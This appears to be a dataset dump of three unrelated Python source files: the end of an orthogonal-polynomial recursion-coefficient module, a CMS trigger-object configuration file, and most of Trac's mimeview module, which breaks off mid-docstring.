References\n ----------\n\n John C. Wheeler, ""Modified moments and Gaussian quadratures""\n Rocky Mountain Journal of Mathematics, Vol. 4, Num. 2 (1974), 287--296\n\n Walter Gautschi, ""Orthogonal Polynomials (in Matlab)\n Journal of Computational and Applied Mathematics, Vol. 178 (2005) 215--234\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/chebyshev.m\n\n """"""\n\n if not isinstance(N, int):\n raise TypeError(\'N must be an integer\')\n\n if N < 1:\n raise ValueError(\'N must be at least 1\')\n\n N = min(N, int(len(mom) / 2))\n\n alpha = np.zeros(N)\n beta = np.zeros(N)\n normsq = np.zeros(N)\n sig = np.zeros((N + 1, 2 * N))\n\n alpha[0] = alpham[0] + mom[1] / mom[0]\n beta[0] = mom[0]\n\n sig[1, :] = mom\n\n for n in range(2, N + 1):\n for m in range(n - 1, 2 * N - n + 1):\n sig[n, m] = sig[n - 1, m + 1] - (alpha[n - 2] - alpham[m]) * sig[n - 1, m] - \\\n beta[n - 2] * sig[n - 2, m] + betam[m] * sig[n - 1, m - 1]\n\n alpha[n - 1] = alpham[n - 1] + sig[n, n] / sig[n, n - 1] - sig[n - 1, n - 1] / \\\n sig[n - 1, n - 2]\n beta[n - 1] = sig[n, n - 1] / sig[n - 1, n - 2]\n\n normsq = np.diagonal(sig, -1)\n\n return alpha, beta, normsq\n\n\ndef rec_jaclog(N, a):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n\n P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)\n\n for the monic polynomials which are orthogonal on [0,1]\n with respect to the weight w(x)=x^a*log(1/x)\n\n Inputs:\n N - polynomial order\n a - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adated from the MATLAB code:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jaclog.m\n """"""\n alphaj, betaj = rec_jacobi01(2 * N, 0, 0)\n mom = mm_log(2 * N, a)\n alpha, beta, _ = mod_chebyshev(N, mom, alphaj, betaj)\n return alpha, beta\n', '## @package TriggerObjectBlock_cfi\n# Configuration file that defines the producer of ROOT-tuple for trigger objects.\n#\n# \\author Subir Sarkar\n# \\author Rosamaria Venditti (INFN Bari, Bari University)\n# \\author Konstantin Androsov (University of Siena, INFN Pisa)\n# \\author Maria Teresa Grippo (University of Siena, INFN Pisa)\n#\n# Copyright 2011-2013 Subir Sarkar, Rosamaria Venditti (INFN Bari, Bari University)\n# Copyright 2014 Konstantin Androsov dummy@email.com,\n# Maria Teresa Grippo dummy@email.com\n#\n# This file is part of X->HH->bbTauTau.\n#\n# X->HH->bbTauTau is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# X->HH->bbTauTau is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with X->HH->bbTauTau. If not, see .\n\nimport FWCore.ParameterSet.Config as cms\n\ntriggerObjectBlock = cms.EDAnalyzer(""TriggerObjectBlock"",\n verbosity = cms.int32(0),\n hltInputTag = cms.InputTag(\'TriggerResults\',\'\',\'HLT\'),\n triggerEventTag = cms.InputTag(\'patTriggerEvent\'),\n hltPathsOfInterest = cms.vstring (""HLT_DoubleMu"",\n ""HLT_Mu"",\n ""HLT_IsoMu"",\n ""HLT_TripleMu"",\n ""IsoPFTau"",\n ""TrkIsoT"",\n ""HLT_Ele""),\n May10ReRecoData = cms.bool(False)\n)\n', '# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2004-2010 Edgewall Software\n# Copyright (C) 2004 Daniel Lundin dummy@email.com\n# Copyright (C) 2005-2006 Christopher Lenz dummy@email.com\n# Copyright (C) 2006-2007 Christian Boos dummy@email.com\n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution. The terms\n# are also available at http://trac.edgewall.org/wiki/TracLicense.\n#\n# This software consists of voluntary contributions made by many\n# individuals. For the exact contribution history, see the revision\n# history and logs, available at http://trac.edgewall.org/log/.\n#\n# Author: Daniel Lundin dummy@email.com\n# Christopher Lenz dummy@email.com\n# Christian Boos dummy@email.com\n\n""""""\nFile metadata management\n------------------------\n\nThe `trac.mimeview` package centralizes the intelligence related to\nfile metadata, principally concerning the `type` (MIME type) of the\ncontent and, if relevant, concerning the text encoding (charset) used\nby the content.\n\nThere are primarily two approaches for getting the MIME type of a\ngiven file, either taking advantage of existing conventions for the\nfile name, or examining the file content and applying various\nheuristics.\n\nThe module also knows how to convert the file content from one type to\nanother type.\n\nIn some cases, only the `url` pointing to the file\'s content is\nactually needed, that\'s why we avoid to read the file\'s content when\nit\'s not needed.\n\nThe actual `content` to be converted might be a `unicode` object, but\nit can also be the raw byte string (`str`) object, or simply an object\nthat can be `read()`.\n\n.. note:: (for plugin developers)\n\n The Mimeview API is quite complex and many things there are\n currently a bit difficult to work with (e.g. what an actual\n `content` might be, see the last paragraph of this description).\n\n So this area is mainly in a \'\'work in progress\'\' state, which will\n be improved along the lines described in :teo:`#3332`.\n\n In particular, if you are interested in writing `IContentConverter`\n and `IHTMLPreviewRenderer` components, note that those interfaces\n will be merged into a new style `IContentConverter`. Feel free to\n contribute remarks and suggestions for improvements to the\n corresponding ticket (#3332 as well).\n""""""\n\nimport re\nfrom StringIO import StringIO\n\nfrom genshi import Markup, Stream\nfrom genshi.core import TEXT, START, END, START_NS, END_NS\nfrom genshi.builder import Fragment, tag\nfrom genshi.input import HTMLParser\n\nfrom trac.config import IntOption, ListOption, Option\nfrom trac.core import *\nfrom trac.resource import Resource\nfrom trac.util import Ranges, content_disposition\nfrom trac.util.text import exception_to_unicode, to_utf8, to_unicode\nfrom trac.util.translation import _, tag_\n\n\n__all__ = [\'Context\', \'Mimeview\', \'RenderingContext\', \'get_mimetype\',\n \'is_binary\', \'detect_unicode\', \'content_to_unicode\', \'ct_mimetype\']\n\nclass RenderingContext(object):\n """"""\n A rendering context specifies \'\'how\'\' the content should be rendered.\n\n It holds together all the needed contextual information that will be\n needed by individual renderer components.\n\n To that end, a context keeps track of the Href instance (`.href`) which\n should be used as a base for building URLs.\n \n It also provides a `PermissionCache` (`.perm`) which can be used to\n restrict the output so that only the authorized information is shown.\n \n A rendering context may also be associated to some Trac resource which\n will be used as the implicit reference when rendering relative links\n or for retrieving relative content and can be used to retrieve related\n metadata.\n\n Rendering contexts can be nested, and a new context can be created from \n an existing context using the call syntax. The previous context can be\n retrieved using the `.parent` attribute.\n \n For example, when rendering a wiki text of a wiki page, the context will\n be associated to a resource identifying that wiki page.\n \n If that wiki text contains a `[[TicketQuery]]` wiki macro, the macro will\n set up nested contexts for each matching ticket that will be used for\n rendering the ticket descriptions.\n\n :since: version 0.11\n """"""\n\n def __init__(self, resource, href=None, perm=None):\n """"""Directly create a `RenderingContext`.\n\n :param resource: the associated resource\n :type resource: `Resource`\n :param href: an `Href` object suitable for creating URLs\n :param perm: a `PermissionCache` object used for restricting the\n generated output to ""authorized"" information only.\n\n The actual `.perm` attribute of the rendering context will be bound\n to the given `resource` so that fine-grained permission checks will\n apply to that.\n """"""\n self.parent = None #: The parent context, if any\n self.resource = resource\n self.href = href\n self.perm = perm(resource) if perm and resource else perm\n self._hints = None\n\n @staticmethod\n def from_request(*args, **kwargs):\n """""":deprecated: since 1.0, use `web_context` instead.""""""\n from trac.web.chrome import web_context\n return web_context(*args, **kwargs)\n\n def __repr__(self):\n path = []\n context = self\n while context:\n if context.resource.realm: # skip toplevel resource \n path.append(repr(context.resource))\n context = context.parent\n return \'<%s %s>\' % (type(self).__name__, \' - \'.join(reversed(path)))\n\n def child(self, resource=None, id=False, version=False, parent=False):\n """"""Create a nested rendering context.\n\n `self` will be the parent for the new nested context.\n\n :param resource: either a `Resource` object or the realm string for a\n resource specification to be associated to the new\n context. If `None`, the resource will be the same\n as the resource of the parent context.\n :param id: the identifier part of the resource specification\n :param version: the version of the resource specification\n :return: the new context object\n :rtype: `RenderingContext`\n\n >>> context = RenderingContext(\'wiki\', \'WikiStart\')\n >>> ticket1 = Resource(\'ticket\', 1)\n >>> context.child(\'ticket\', 1).resource == ticket1\n True\n >>> context.child(ticket1).resource is ticket1\n True\n >>> context.child(ticket1)().resource is ticket1\n True\n """"""\n if resource:\n resource = Resource(resource, id=id, version=version,\n parent=parent)\n else:\n resource = self.resource\n context = RenderingContext(resource, href=self.href, perm=self.perm)\n context.parent = self\n\n # hack for context instances created by from_request()\n # this is needed because various parts of the code rely on a request\n # object being available, but that will hopefully improve in the\n # future\n if hasattr(self, \'req\'):\n context.req = self.req\n\n return context\n\n __call__ = child\n\n def __contains__(self, resource):\n """"""Check whether a resource is in the rendering path.\n\n The primary use for this check is to avoid to render the content of a\n resource if we\'re already embedded in a context associated to that\n resource.\n\n :param resource: a `Resource` specification which will be checked for\n """"""\n context = self\n while context:\n if context.resource and \\\n context.resource.realm == resource.realm and \\\n context.resource.id == resource.id:\n # we don\'t care about version here\n return True\n context = context.parent\n\n # Rendering hints \n #\n # A rendering hint is a key/value pairs that can influence renderers,\n # wiki formatters and processors in the way they produce their output.\n # The keys are strings, but the values could be anything.\n #\n # In nested contexts, the hints are inherited from their parent context,\n # unless overriden locally.\n\n def set_hints(self, **keyvalues):\n """"""Set rendering hints for this rendering context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\', shorten_lines=True)\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.set_hints(wiki_flavor=\'html\', preserve_newlines=True)\n >>> (t_ctx.get_hint(\'wiki_flavor\'), t_ctx.get_hint(\'shorten_lines\'), \\\n t_ctx.get_hint(\'preserve_newlines\'))\n (\'html\', True, True)\n >>> (ctx.get_hint(\'wiki_flavor\'), ctx.get_hint(\'shorten_lines\'), \\\n ctx.get_hint(\'preserve_newlines\'))\n (\'oneliner\', True, None)\n """"""\n if self._hints is None:\n self._hints = {}\n hints = self._parent_hints()\n if hints is not None:\n self._hints.update(hints)\n self._hints.update(keyvalues)\n\n def get_hint(self, hint, default=None):\n """"""Retrieve a rendering hint from this context or an ancestor context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\')\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.get_hint(\'wiki_flavor\')\n \'oneliner\'\n >>> t_ctx.get_hint(\'preserve_newlines\', True)\n True\n """"""\n hints = self._hints\n if hints is None:\n hints = self._parent_hints()\n if hints is None:\n return default\n return hints.get(hint, default)\n\n def has_hint(self, hint):\n """"""Test whether a rendering hint is defined in this context or in some\n ancestor context.\n\n >>> ctx = RenderingContext(\'timeline\')\n >>> ctx.set_hints(wiki_flavor=\'oneliner\')\n >>> t_ctx = ctx(\'ticket\', 1)\n >>> t_ctx.has_hint(\'wiki_flavor\')\n True\n >>> t_ctx.has_hint(\'preserve_newlines\')\n False\n """"""\n hints = self._hints\n if hints is None:\n hints = self._parent_hints()\n if hints is None:\n return False\n return hint in hints\n\n def _parent_hints(self):\n p = self.parent\n while p and p._hints is None:\n p = p.parent\n return p and p._hints\n\n\nclass Context(RenderingContext):\n """""":deprecated: old name kept for compatibility, use `RenderingContext`.""""""\n\n\n# Some common MIME types and their associated keywords and/or file extensions\n\nKNOWN_MIME_TYPES = {\n \'application/javascript\': \'js\',\n \'application/msword\': \'doc dot\',\n \'application/pdf\': \'pdf\',\n \'application/postscript\': \'ps\',\n \'application/rtf\': \'rtf\',\n \'application/x-sh\': \'sh\',\n \'application/x-csh\': \'csh\',\n \'application/x-troff\': \'nroff roff troff\',\n \'application/x-yaml\': \'yml yaml\',\n \n \'application/rss+xml\': \'rss\',\n \'application/xsl+xml\': \'xsl\',\n \'application/xslt+xml\': \'xslt\',\n \n \'image/x-icon\': \'ico\',\n \'image/svg+xml\': \'svg\',\n \n \'model/vrml\': \'vrml wrl\',\n \n \'text/css\': \'css\',\n \'text/html\': \'html htm\',\n \'text/plain\': \'txt TXT text README INSTALL \'\n \'AUTHORS COPYING ChangeLog RELEASE\',\n \'text/xml\': \'xml\',\n \n # see also TEXT_X_TYPES below\n \'text/x-csrc\': \'c xs\',\n \'text/x-chdr\': \'h\',\n \'text/x-c++src\': \'cc CC cpp C c++ C++\',\n \'text/x-c++hdr\': \'hh HH hpp H\',\n \'text/x-csharp\': \'cs c# C#\',\n \'text/x-diff\': \'patch\',\n \'text/x-eiffel\': \'e\',\n \'text/x-elisp\': \'el\',\n \'text/x-fortran\': \'f\',\n \'text/x-haskell\': \'hs\',\n \'text/x-ini\': \'ini cfg\',\n \'text/x-objc\': \'m mm\',\n \'text/x-ocaml\': \'ml mli\',\n \'text/x-makefile\': \'make mk Makefile GNUMakefile\',\n \'text/x-pascal\': \'pas\',\n \'text/x-perl\': \'pl pm PL\',\n \'text/x-php\': \'php3 php4\',\n \'text/x-python\': \'py\',\n \'text/x-pyrex\': \'pyx\',\n \'text/x-ruby\': \'rb\',\n \'text/x-scheme\': \'scm\',\n \'text/x-textile\': \'txtl\',\n \'text/x-vba\': \'vb vba bas\',\n \'text/x-verilog\': \'v\',\n \'text/x-vhdl\': \'vhd\',\n}\nfor t in KNOWN_MIME_TYPES.keys():\n types = KNOWN_MIME_TYPES[t].split()\n if t.startswith(\'text/x-\'):\n types.append(t[len(\'text/x-\'):])\n KNOWN_MIME_TYPES[t] = types\n\n# extend the above with simple (text/x-: ) mappings\n\nTEXT_X_TYPES = """"""\n ada asm asp awk idl inf java ksh lua m4 mail psp rfc rst sql tcl tex zsh\n""""""\nfor x in TEXT_X_TYPES.split():\n KNOWN_MIME_TYPES.setdefault(\'text/x-%s\' % x, []).append(x)\n\n\n# Default mapping from keywords/extensions to known MIME types:\n\nMIME_MAP = {}\nfor t, exts in KNOWN_MIME_TYPES.items():\n MIME_MAP[t] = t\n for e in exts:\n MIME_MAP[e] = t\n\n# Simple builtin autodetection from the content using a regexp\nMODE_RE = re.compile(r""""""\n \\#!.+?env\\s+(\\w+) # 1. look for shebang with env\n | \\#!(?:[/\\w.-_]+/)?(\\w+) # 2. look for regular shebang\n | -\\*-\\s*(?:mode:\\s*)?([\\w+-]+)\\s*-\\*- # 3. look for Emacs\' -*- mode -*-\n | vim:.*?(?:syntax|filetype|ft)=(\\w+) # 4. look for VIM\'s syntax=\n """""", re.VERBOSE)\n\ndef get_mimetype(filename, content=None, mime_map=MIME_MAP):\n """"""Guess the most probable MIME type of a file with the given name.\n\n `filename` is either a filename (the lookup will then use the suffix)\n or some arbitrary keyword.\n \n `content` is either a `str` or an `unicode` string.\n """"""\n suffix = filename.split(\'.\')[-1]\n if suffix in mime_map:\n # 1) mimetype from the suffix, using the `mime_map`\n return mime_map[suffix]\n else:\n mimetype = None\n try:\n import mimetypes\n # 2) mimetype from the suffix, using the `mimetypes` module\n mimetype = mimetypes.guess_type(filename)[0]\n except Exception:\n pass\n if not mimetype and content:\n match = re.search(MODE_RE, content[:1000] + content[-1000:])\n if match:\n mode = match.group(1) or match.group(2) or match.group(4) or \\\n match.group(3).lower()\n if mode in mime_map:\n # 3) mimetype from the content, using the `MODE_RE`\n return mime_map[mode]\n else:\n if is_binary(content):\n # 4) mimetype from the content, using`is_binary`\n return \'application/octet-stream\'\n return mimetype\n\ndef ct_mimetype(content_type):\n """"""Return the mimetype part of a content type.""""""\n return (content_type or \'\').split(\';\')[0].strip()\n\ndef is_binary(data):\n """"""Detect binary content by checking the first thousand bytes for zeroes.\n\n Operate on either `str` or `unicode` strings.\n """"""\n if isinstance(data, str) and detect_unicode(data):\n return False\n return \'\\0\' in data[:1000]\n\ndef detect_unicode(data):\n """"""Detect different unicode charsets by looking for BOMs (Byte Order Mark).\n\n Operate obviously only on `str` objects.\n """"""\n if data.startswith(\'\\xff\\xfe\'):\n return \'utf-16-le\'\n elif data.startswith(\'\\xfe\\xff\'):\n return \'utf-16-be\'\n elif data.startswith(\'\\xef\\xbb\\xbf\'):\n return \'utf-8\'\n else:\n return None\n\ndef content_to_unicode(env, content, mimetype):\n """"""Retrieve an `unicode` object from a `content` to be previewed.\n\n In case the raw content had an unicode BOM, we remove it.\n\n >>> from trac.test import EnvironmentStub\n >>> env = EnvironmentStub()\n >>> content_to_unicode(env, u""\\ufeffNo BOM! h\\u00e9 !"", \'\')\n u\'No BOM! h\\\\xe9 !\'\n >>> content_to_unicode(env, ""\\xef\\xbb\\xbfNo BOM! h\\xc3\\xa9 !"", \'\')\n u\'No BOM! h\\\\xe9 !\'\n\n """"""\n mimeview = Mimeview(env)\n if hasattr(content, \'read\'):\n content = content.read(mimeview.max_preview_size)\n u = mimeview.to_unicode(content, mimetype)\n if u and u[0] == u\'\\ufeff\':\n u = u[1:]\n return u\n\n\nclass IHTMLPreviewRenderer(Interface):\n """"""Extension point interface for components that add HTML renderers of\n specific content types to the `Mimeview` component.\n\n .. note::\n\n This interface will be merged with IContentConverter, as\n conversion to text/html will simply be a particular content\n conversion.\n\n Note however that the IHTMLPreviewRenderer will still be\n supported for a while through an adapter, whereas the\n IContentConverter interface itself will be changed.\n\n So if all you want to do is convert to HTML and don\'t feel like\n following the API changes, you should rather implement this\n interface for the time being.\n """"""\n\n #: implementing classes should set this property to True if they\n #: support text content where Trac should expand tabs into spaces\n expand_tabs = False\n\n #: indicate whether the output of this renderer is source code that can\n #: be decorated with annotations\n returns_source = False\n\n def get_quality_ratio(mimetype):\n """"""Return the level of support this renderer provides for the `content`\n of the specified MIME type. The return value must be a number between\n 0 and 9, where 0 means no support and 9 means ""perfect"" support.\n """"""\n\n def render(context, mimetype, content, filename=None, url=None):\n """"""Render an XHTML preview of the raw `content` in a RenderingContext.\n\n The `content` might be:\n * a `str` object\n * an `unicode` string\n * any object with a `read` method, returning one of the above\n\n It is assumed that the content will correspond to the given `mimetype`.\n\n Besides the `content` value, the same content may eventually\n be available through the `filename` or `url` parameters.\n This is useful for renderers that embed objects, using or\n instead of including the content inline.\n \n Can return the generated XHTML text as a single string or as an\n iterable that yields strings. In the latter case, the list will\n be considered to correspond to lines of text in the original content.\n """"""\n\n\nclass IHTMLPreviewAnnotator(Interface):\n """"""Extension point interface for components that can annotate an XHTML\n representation of file contents with additional information.""""""\n\n def get_annotation_type():\n """"""Return a (type, label, description) tuple\n that defines the type of annotation and provides human readable names.\n The `type` element should be unique to the annotator.\n The `label` element is used as column heading for the table,\n while `description` is used as a display name to let the user\n toggle the appearance of the annotation type.\n """"""\n \n def get_annotation_data(context):\n """"""Return some metadata to be used by the `annotate_row` method below.\n\n This will be called only once, before lines are processed.\n If this raises an error, that annotator won\'t be used.\n """"""\n\n def annotate_row(context, row, number, line, data):\n """"""Return the XHTML markup for the table cell that contains the\n annotation data.\n\n `context` is the context corresponding to the content being annotated,\n `row` is the tr Element being built, `number` is the line number being\n processed and `line` is the line\'s actual content.\n `data` is whatever additional data the `get_annotation_data` method\n decided to provide.\n """"""\n\n\nclass IContentConverter(Interface):\n """"""An extension point interface for generic MIME based content\n conversion.\n\n .. note:: This api will likely change in the future (see :teo:`#3332`)\n\n """"""\n\n def get_supported_conversions():\n """"""Return an iterable of tuples in the form (key, name, extension,\n in_mimetype, out_mimetype, quality) representing the MIME conversions\n supported and\n the quality ratio of the conversion in the range 0 to 9, where 0 means\n no support and 9 means ""perfect"" support. eg. (\'latex\', \'LaTeX\', \'tex\',\n \'text/x-trac-wiki\', \'text/plain\', 8)""""""\n\n def convert_content(req, mimetype, content, key):\n """"""Convert the given content from mimetype to the output MIME type\n represented by key. Returns a tuple in the form (content,\n output_mime_type) or None if conversion is not possible.""""""\n\n\nclass Content(object):\n """"""A lazy file-like object that only reads `input` if necessary.""""""\n def __init__(self, input, max_size):\n self.input = input\n self.max_size = max_size\n self.content = None\n \n def read(self, size=-1):\n if size == 0:\n return \'\'\n if self.content is None:\n self.content = StringIO(self.input.read(self.max_size))\n return self.content.read(size)\n \n def reset(self):\n if self.content is not None:\n self.content.seek(0)\n\n\nclass Mimeview(Component):\n """"""Generic HTML renderer for data, typically source code.""""""\n\n required = True\n\n renderers = ExtensionPoint(IHTMLPreviewRenderer)\n annotators = ExtensionPoint(IHTMLPreviewAnnotator)\n converters = ExtensionPoint(IContentConverter)\n\n default_charset = Option(\'trac\', \'default_charset\', \'utf-8\',\n """"""Charset to be used when in doubt."""""")\n\n tab_width = IntOption(\'mimeviewer\', \'tab_width\', 8,\n """"""Displayed tab width in file preview. (\'\'since 0.9\'\')"""""")\n\n max_preview_size = IntOption(\'mimeviewer\', \'max_preview_size\', 262144,\n """"""Maximum file size for HTML preview. (\'\'since 0.9\'\')"""""")\n\n mime_map = ListOption(\'mimeviewer\', \'mime_map\',\n \'text/x-dylan:dylan, text/x-idl:ice, text/x-ada:ads:adb\',\n doc=""""""List of additional MIME types and keyword mappings.\n Mappings are comma-separated, and for each MIME type,\n there\'s a colon ("":"") separated list of associated keywords\n or file extensions. (\'\'since 0.10\'\')"""""")\n\n treat_as_binary = ListOption(\'mimeviewer\', \'treat_as_binary\',\n \'application/octet-stream, application/pdf, application/postscript, \'\n \'application/msword,application/rtf,\',\n doc=""""""Comma-separated list of MIME types that should be treated as\n binary data. (\'\'since 0.11.5\'\')"""""")\n\n def __init__(self):\n self._mime_map = None\n\n # Public API\n\n def get_supported_conversions(self, mimetype):\n """"""Return a list of target MIME types in same form as\n `IContentConverter.get_supported_conversions()`, but with the converter\n component appended. Output is ordered from best to worst quality.""""""\n converters = []\n for converter in self.converters:\n conversions = converter.get_supported_conversions() or []\n for k, n, e, im, om, q in conversions:\n if im == mimetype and q > 0:\n converters.append((k, n, e, im, om, q, converter))\n converters = sorted(converters, key=lambda i: i[-2], reverse=True)\n return converters\n\n def convert_content(self, req, mimetype, content, key, filename=None,\n url=None):\n """"""Convert the given content to the target MIME type represented by\n `key`, which can be either a MIME type or a key. Returns a tuple of\n (content, output_mime_type, extension).""""""\n if not content:\n return (\'\', \'text/plain;charset=utf-8\', \'.txt\')\n\n # Ensure we have a MIME type for this content\n full_mimetype = mimetype\n if not full_mimetype:\n if hasattr(content, \'read\'):\n content = content.read(self.max_preview_size)\n full_mimetype = self.get_mimetype(filename, content)\n if full_mimetype:\n mimetype = ct_mimetype(full_mimetype) # split off charset\n else:\n mimetype = full_mimetype = \'text/plain\' # fallback if not binary\n\n # Choose best converter\n candidates = list(self.get_supported_conversions(mimetype) or [])\n candidates = [c for c in candidates if key in (c[0], c[4])]\n if not candidates:\n raise TracError(\n _(""No available MIME conversions from %(old)s to %(new)s"",\n old=mimetype, new=key))\n\n # First successful conversion wins\n for ck, name, ext, input_mimettype, output_mimetype, quality, \\\n converter in candidates:\n output = converter.convert_content(req, mimetype, content, ck)\n if output:\n return (output[0], output[1], ext)\n raise TracError(\n _(""No available MIME conversions from %(old)s to %(new)s"",\n old=mimetype, new=key))\n\n def get_annotation_types(self):\n """"""Generator that returns all available annotation types.""""""\n for annotator in self.annotators:\n yield annotator.get_annotation_type()\n\n def render(self, context, mimetype, content, filename=None, url=None,\n annotations=None, force_source=False):\n """"""Render an XHTML preview of the given `content`.\n\n `content` is the same as an `IHTMLPreviewRenderer.render`\'s\n `content` argument.\n\n The specified `mimetype` will be used to select the most appropriate\n `IHTMLPreviewRenderer` implementation available for this MIME type.\n If not given, the MIME type will be infered from the filename or the\n content.\n\n Return a string containing the XHTML text.\n \n When rendering with an `IHTMLPreviewRenderer` fails, a warning is added\n to the request associated with the context (if any), unless the\n `disable_warnings` hint is set to `True`.\n """"""\n if not content:\n return \'\'\n if not isinstance(context, RenderingContext):\n raise TypeError(""RenderingContext expected (since 0.11)"")\n\n # Ensure we have a MIME type for this content\n full_mimetype = mimetype\n if not full_mimetype:\n if hasattr(content, \'read\'):\n content = content.read(self.max_preview_size)\n full_mimetype = self.get_mimetype(filename, content)\n if full_mimetype:\n mimetype = ct_mimetype(full_mimetype) # split off charset\n else:\n mimetype = full_mimetype = \'text/plain\' # fallback if not binary\n\n # Determine candidate `IHTMLPreviewRenderer`s\n candidates = []\n for renderer in self.renderers:\n qr = renderer.get_quality_ratio(mimetype)\n if qr > 0:\n candidates.append((qr, renderer))\n candidates.sort(lambda x, y: cmp(y[0], x[0]))\n \n # Wrap file-like object so that it can be read multiple times\n if hasattr(content, \'read\'):\n content = Content(content, self.max_preview_size)\n\n # First candidate which renders successfully wins.\n # Also, we don\'t want to expand tabs more than once.\n expanded_content = None\n for qr, renderer in candidates:\n if force_source and not getattr(renderer, \'returns_source\', False):\n continue # skip non-source renderers in force_source mode\n if isinstance(content, Content):\n content.reset()\n try:\n ann_names = \', \'.join(annotations) if annotations else \\\n \'no annotations\'\n self.log.debug(\'Trying to render HTML preview using %s [%s]\',\n renderer.__class__.__name__, ann_names)\n\n # check if we need to perform a tab expansion\n rendered_content = content\n if getattr(renderer, \'expand_tabs\', False):\n if expanded_content is None:\n content = content_to_unicode(self.env, content,\n full_mimetype)\n expanded_content = content.expandtabs(self.tab_width)\n rendered_content = expanded_content\n\n result = renderer.render(context, full_mimetype,\n rendered_content, filename, url)\n if not result:\n continue\n\n if not (force_source or getattr(renderer, \'returns_source\',\n False)):\n # Direct rendering of content\n if isinstance(result, basestring):\n if not isinstance(result, unicode):\n result = to_unicode(result)\n return Markup(to_unicode(result))\n elif isinstance(result, Fragment):\n return result.generate()\n else:\n return result\n\n # Render content as source code\n if annotations:\n m = context.req.args.get(\'marks\') if context.req else None\n return self._render_source(context, result, annotations,\n m and Ranges(m))\n else:\n if isinstance(result, list):\n result = Markup(\'\\n\').join(result)\n return tag.div(class_=\'code\')(tag.pre(result)).generate()\n\n except Exception, e:\n self.log.warning(\'HTML preview using %s failed: %s\',\n renderer.__class__.__name__,\n exception_to_unicode(e, traceback=True))\n if context.req and not context.get_hint(\'disable_warnings\'):\n from trac.web.chrome import add_warning\n add_warning(context.req,\n _(""HTML preview using %(renderer)s failed (%(err)s)"",\n renderer=renderer.__class__.__name__,\n err=exception_to_unicode(e)))\n\n def _render_source(self, context, stream, annotations, marks=None):\n from trac.web.chrome import add_warning\n annotators, labels, titles = {}, {}, {}\n for annotator in self.annotators:\n atype, alabel, atitle = annotator.get_annotation_type()\n if atype in annotations:\n labels[atype] = alabel\n titles[atype] = atitle\n annotators[atype] = annotator\n annotations = [a for a in annotations if a in annotators]\n\n if isinstance(stream, list):\n stream = HTMLParser(StringIO(u\'\\n\'.join(stream)))\n elif isinstance(stream, unicode):\n text = stream\n def linesplitter():\n for line in text.splitlines(True):\n yield TEXT, line, (None, -1, -1)\n stream = linesplitter()\n\n annotator_datas = []\n for a in annotations:\n annotator = annotators[a]\n try:\n data = (annotator, annotator.get_annotation_data(context))\n except TracError, e:\n self.log.warning(""Can\'t use annotator \'%s\': %s"", a, e.message)\n add_warning(context.req, tag.strong(\n tag_(""Can\'t use %(annotator)s annotator: %(error)s"",\n annotator=tag.em(a), error=tag.pre(e.message))))\n data = (None, None)\n annotator_datas.append(data)\n\n def _head_row():\n return tag.tr(\n [tag.th(labels[a], class_=a, title=titles[a])\n for a in annotations] +\n [tag.th(u\'\\xa0\', class_=\'content\')]\n )\n\n def _body_rows():\n for idx, line in enumerate(_group_lines(stream)):\n row = tag.tr()\n if marks and idx + 1 in marks:\n row(class_=\'hilite\')\n for annotator, data in annotator_datas:\n if annotator:\n annotator.annotate_row(context, row, idx+1, line, data)\n else:\n row.append(tag.td())\n row.append(tag.td(line))\n yield row\n\n return tag.table(class_=\'code\')(\n tag.thead(_head_row()),\n tag.tbody(_body_rows())\n )\n\n def get_max_preview_size(self):\n """""":deprecated: use `max_preview_size` attribute directly.""""""\n return self.max_preview_size\n\n def get_charset(self, content=\'\', mimetype=None):\n """"""Infer the character encoding from the `content` or the `mimetype`.\n\n `content` is either a `str` or an `unicode` object.\n \n The charset will be determined using this order:\n * from the charset information present in the `mimetype` argument\n * auto-detection of the charset from the `content`\n * the configured `default_charset` \n """"""\n if mimetype:\n ctpos = mimetype.find(\'charset=\')\n if ctpos >= 0:\n return mimetype[ctpos + 8:].strip()\n if isinstance(content, str):\n utf = detect_unicode(content)\n if utf is not None:\n return utf\n return self.default_charset\n\n @property\n def mime_map(self):\n # Extend default extension to MIME type mappings with configured ones\n if not self._mime_map:\n self._mime_map = MIME_MAP.copy()\n for mapping in self.config[\'mimeviewer\'].getlist(\'mime_map\'):\n if \':\' in mapping:\n assocations = mapping.split(\':\')\n for keyword in assocations: # Note: [0] kept on purpose\n self._mime_map[keyword] = assocations[0]\n return self._mime_map\n\n def get_mimetype(self, filename, content=None):\n """"""Infer the MIME type from the `filename` or the `content`.\n\n `content` is either a `str` or an `unicode` object.\n\n Return the detected MIME type, augmented by the\n charset information (i.e. ""; charset=...""),\n or `None` if detection failed.\n """"""\n\n mimetype = get_mimetype(filename, content, self.mime_map)\n charset = None\n if mimetype:\n charset = self.get_charset(content, mimetype)\n if mimetype and charset and not \'charset\' in mimetype:\n mimetype += \'; charset=\' + charset\n return mimetype\n\n def is_binary(self, mimetype=None, filename=None, content=None):\n """"""Check if a file must be considered as binary.""""""\n if not mimetype and filename:\n mimetype = self.get_mimetype(filename, content)\n if mimetype:\n mimetype = ct_mimetype(mimetype)\n if mimetype in self.treat_as_binary:\n return True\n if content is not None and is_binary(content):\n return True\n return False\n\n def to_utf8(self, content, mimetype=None):\n """"""Convert an encoded `content` to utf-8.\n\n :deprecated: since 0.10, you should use `unicode` strings only.\n """"""\n return to_utf8(content, self.get_charset(content, mimetype))\n\n def to_unicode(self, content, mimetype=None, charset=None):\n """"""Convert `content` (an encoded `str` 